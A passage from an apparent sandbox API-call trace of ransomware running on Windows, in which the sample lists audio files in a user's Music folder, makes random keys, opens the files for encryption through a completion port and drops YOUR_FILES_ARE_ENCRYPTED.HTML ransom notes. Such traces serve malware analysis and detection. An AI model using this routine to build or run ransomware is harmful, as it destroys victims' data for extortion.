param_1=0x4ebd426, param_2="%02X" | out: param_1="20") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="C8") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="15") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="AA") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="E6") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="1E") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="0B") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="B2") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="9A") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="88") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: 
param_1="B1") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="B5") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="0D") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="D3") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="A1") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="23") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="FC") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="ED") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D3") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="1C") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="80") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="3E") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="8D") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="1E") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="B9") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="F2") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="89") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="D4") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="4B") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="7E") returned 2 [0168.081] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 
2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" [0168.081] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.081] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.083] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe994390, ftCreationTime.dwHighDateTime=0x1d7def8, ftLastAccessTime.dwLowDateTime=0x1a0e80e0, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x1a0e80e0, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x18f42, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="RGmfEkC6DIb.wav", cAlternateFileName="RGMFEK~1.WAV")) returned 0 [0168.083] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.083] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0168.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.084] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.086] CloseHandle (hObject=0x5e4) returned 1 
[0168.086] GetProcessHeap () returned 0x270000 [0168.087] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0168.087] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5886cab0, ftCreationTime.dwHighDateTime=0x1d7dc1d, ftLastAccessTime.dwLowDateTime=0xb4a8b970, ftLastAccessTime.dwHighDateTime=0x1d7dd44, ftLastWriteTime.dwLowDateTime=0xb4a8b970, ftLastWriteTime.dwHighDateTime=0x1d7dd44, nFileSizeHigh=0x0, nFileSizeLow=0x13b9b, dwReserved0=0x867451, dwReserved1=0x0, cFileName="ud8n5jKw.m4a", cAlternateFileName="")) returned 1 [0168.087] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a") returned 56 [0168.087] lstrcmpW (lpString1="ud8n5jKw.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.087] PathFindExtensionW (pszPath="ud8n5jKw.m4a") returned=".m4a" [0168.087] lstrlenW (lpString=".m4a") returned 4 [0168.087] PathFindExtensionW (pszPath="ud8n5jKw.m4a") returned=".m4a" [0168.087] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\ud8n5jkw.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.088] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80795) returned 1 [0168.088] GetProcessHeap () returned 0x270000 [0168.088] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0168.092] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="39") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd72e, 
param_2="%02X" | out: param_1="80") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C7") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="6C") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3A") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3A") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="46") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="41") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="14") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="DC") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="41") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="E7") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="8D") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="38") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BA") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="AB") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="1E") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="62") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="92") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="55") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="37") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="95") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="01") returned 2 [0168.093] wsprintfW 
(in: param_1=0x4ebd786, param_2="%02X" | out: param_1="48") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="69") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F4") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="46") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="8C") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="62") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="E4") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="CF") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="68") returned 2 [0168.094] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" [0168.094] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.094] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0168.094] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5886cab0, ftCreationTime.dwHighDateTime=0x1d7dc1d, ftLastAccessTime.dwLowDateTime=0xb4a8b970, ftLastAccessTime.dwHighDateTime=0x1d7dd44, ftLastWriteTime.dwLowDateTime=0xb4a8b970, ftLastWriteTime.dwHighDateTime=0x1d7dd44, nFileSizeHigh=0x0, nFileSizeLow=0x13b9b, dwReserved0=0x867451, dwReserved1=0x0, cFileName="ud8n5jKw.m4a", cAlternateFileName="")) returned 0 [0168.094] FindClose (in: hFindFile=0x42f31c0 | out: 
hFindFile=0x42f31c0) returned 1 [0168.094] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0168.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0168.095] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.097] CloseHandle (hObject=0x5a4) returned 1 [0168.097] GetProcessHeap () returned 0x270000 [0168.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.098] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="yg 2", cAlternateFileName="YG2~1")) returned 0 [0168.098] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.098] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0168.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\music\\qemppb6d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0168.099] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.101] CloseHandle (hObject=0x5ac) returned 1 [0168.101] GetProcessHeap () returned 0x270000 [0168.102] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.102] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aa2beb0, ftCreationTime.dwHighDateTime=0x1d7df51, ftLastAccessTime.dwLowDateTime=0xb9e5e640, ftLastAccessTime.dwHighDateTime=0x1d7e00c, ftLastWriteTime.dwLowDateTime=0xb9e5e640, ftLastWriteTime.dwHighDateTime=0x1d7e00c, nFileSizeHigh=0x0, nFileSizeLow=0x15229, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SkVxCvpKdtQjOiR8Ir9y.m4a", cAlternateFileName="SKVXCV~1.M4A")) returned 1 [0168.102] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a") returned 54 [0168.102] lstrcmpW (lpString1="SkVxCvpKdtQjOiR8Ir9y.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.102] PathFindExtensionW (pszPath="SkVxCvpKdtQjOiR8Ir9y.m4a") returned=".m4a" [0168.102] lstrlenW (lpString=".m4a") returned 4 [0168.102] PathFindExtensionW (pszPath="SkVxCvpKdtQjOiR8Ir9y.m4a") returned=".m4a" [0168.102] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" (normalized: 
"c:\\users\\5alr3u30d3\\music\\skvxcvpkdtqjoir8ir9y.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0168.103] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=86569) returned 1 [0168.103] GetProcessHeap () returned 0x270000 [0168.103] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.104] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="D7") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C2") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="D9") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BE") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="17") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="69") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FF") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="7B") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="13") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1A") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C8") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B2") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="24") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd82, 
param_2="%02X" | out: param_1="B4") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="F7") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="96") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="E0") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="FA") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="7D") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="DC") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B8") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="3F") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="EF") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="94") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A0") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="6F") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="EB") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="44") returned 2 [0168.105] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="0D") returned 2 [0168.105] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" [0168.105] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.105] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) 
returned 1 [0168.105] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba27e0, ftCreationTime.dwHighDateTime=0x1d7e11f, ftLastAccessTime.dwLowDateTime=0xfbcf2280, ftLastAccessTime.dwHighDateTime=0x1d7e433, ftLastWriteTime.dwLowDateTime=0xfbcf2280, ftLastWriteTime.dwHighDateTime=0x1d7e433, nFileSizeHigh=0x0, nFileSizeLow=0x13291, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="tdPwiKvOmFwgvO.wav", cAlternateFileName="TDPWIK~1.WAV")) returned 1 [0168.105] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav") returned 48 [0168.105] lstrcmpW (lpString1="tdPwiKvOmFwgvO.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.105] PathFindExtensionW (pszPath="tdPwiKvOmFwgvO.wav") returned=".wav" [0168.105] lstrlenW (lpString=".wav") returned 4 [0168.105] PathFindExtensionW (pszPath="tdPwiKvOmFwgvO.wav") returned=".wav" [0168.105] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\tdpwikvomfwgvo.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.106] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78481) returned 1 [0168.106] GetProcessHeap () returned 0x270000 [0168.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76081a0 [0168.108] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="84") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="13") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="49") 
returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1B") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1E") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CF") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="22") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="17") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F9") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="29") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DF") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CA") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B9") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="2C") returned 2 [0168.108] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="57") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C7") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="BD") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="93") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B9") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="6B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="F6") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="74") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A0") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="33") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdda2, 
param_2="%02X" | out: param_1="91") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="6B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="B9") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="01") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C2") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="2B") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="EA") returned 2 [0168.109] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1A") returned 2 [0168.110] lstrcpyW (in: lpString1=0x7618254, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav" [0168.110] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x76081a0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.110] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76081a0, lpOverlapped=0x76081a0) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x602eb480, ftCreationTime.dwHighDateTime=0x1d7e1db, ftLastAccessTime.dwLowDateTime=0x77271e40, ftLastAccessTime.dwHighDateTime=0x1d7e2fb, ftLastWriteTime.dwLowDateTime=0x77271e40, ftLastWriteTime.dwHighDateTime=0x1d7e2fb, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="vENfC-vF_q47b2P1dmc.mp3", cAlternateFileName="VENFC-~1.MP3")) returned 1 [0168.110] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3") returned 53 [0168.110] lstrcmpW 
